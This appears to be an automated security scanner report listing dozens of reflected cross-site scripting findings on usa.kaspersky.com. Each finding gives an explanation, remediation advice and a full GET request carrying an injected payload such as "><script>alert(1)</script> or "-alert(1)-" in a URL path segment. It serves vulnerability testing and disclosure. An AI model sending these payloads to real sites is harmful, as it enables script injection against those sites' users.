Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50a3f"-alert(1)-"80bc3e9188a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites50a3f"-alert(1)-"80bc3e9188a/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cc5"-alert(1)-"19bcc8754ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all42cc5"-alert(1)-"19bcc8754ee/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e94c"><script>alert(1)</script>8ee69f6e42a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all8e94c"><script>alert(1)</script>8ee69f6e42a/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84fcc"-alert(1)-"e3f22eec311 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes84fcc"-alert(1)-"e3f22eec311/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ecf9"><script>alert(1)</script>35fe4c3edad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes2ecf9"><script>alert(1)</script>35fe4c3edad/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb2c"-alert(1)-"defda43c72b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zenacb2c"-alert(1)-"defda43c72b/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b57"><script>alert(1)</script>1399bdc859f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zenf4b57"><script>alert(1)</script>1399bdc859f/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55622"><script>alert(1)</script>5993aee8954 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme55622"><script>alert(1)</script>5993aee8954/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9524"-alert(1)-"162f95c534c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usathemef9524"-alert(1)-"162f95c534c/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d980"><script>alert(1)</script>bb34429b864 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom8d980"><script>alert(1)</script>bb34429b864/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad070"-alert(1)-"0a6f9a5e76e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/customad070"-alert(1)-"0a6f9a5e76e/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc898"><script>alert(1)</script>be3f789ebb4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modulesdc898"><script>alert(1)</script>be3f789ebb4/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 108f3"-alert(1)-"554f67a870 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules108f3"-alert(1)-"554f67a870/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10988"-alert(1)-"4ffcedf6e1d was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock10988"-alert(1)-"4ffcedf6e1d/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a097"><script>alert(1)</script>1622e582d22 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock3a097"><script>alert(1)</script>1622e582d22/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b2a7"><script>alert(1)</script>deb52bb8ed4 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home6b2a7"><script>alert(1)</script>deb52bb8ed4/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44d98"-alert(1)-"3bfb65bc033 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home44d98"-alert(1)-"3bfb65bc033/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05ea"-alert(1)-"447b63679fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6348"><script>alert(1)</script>ef3152fde57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77e65"-alert(1)-"1a4299fe725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50668"><script>alert(1)</script>7026b070ce2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a958e"><script>alert(1)</script>d6121ecfb71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc9f8"-alert(1)-"8fb20bcae2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a76"><script>alert(1)</script>728f084259e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fa3"-alert(1)-"d3bc9293f2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c98"><script>alert(1)</script>740b9641b5a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f5"-alert(1)-"49acdc67907 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f5c2"-alert(1)-"ee985bf493c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67846"><script>alert(1)</script>be65bc9e9b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f93"-alert(1)-"88344e1a75c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92f7"><script>alert(1)</script>e64a1e12636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fce"-alert(1)-"d5f511604d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c39c"><script>alert(1)</script>b20d160fad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abf7"-alert(1)-"9b7583af2f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95dba"><script>alert(1)</script>e48d751b1d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d226"-alert(1)-"5cbfac5401b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites7d226"-alert(1)-"5cbfac5401b/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d2ac"><script>alert(1)</script>6aad20417ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites5d2ac"><script>alert(1)</script>6aad20417ca/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 815b2"><script>alert(1)</script>37f0e3b07ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com815b2"><script>alert(1)</script>37f0e3b07ae/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb994"-alert(1)-"9771fba1a77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.comcb994"-alert(1)-"9771fba1a77/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fd41"-alert(1)-"4857cb508a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files6fd41"-alert(1)-"4857cb508a7/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52d43"><script>alert(1)</script>2e4b5f14ad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files52d43"><script>alert(1)</script>2e4b5f14ad6/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb19"><script>alert(1)</script>6efbe913e54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/ctoolsdcb19"><script>alert(1)</script>6efbe913e54/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
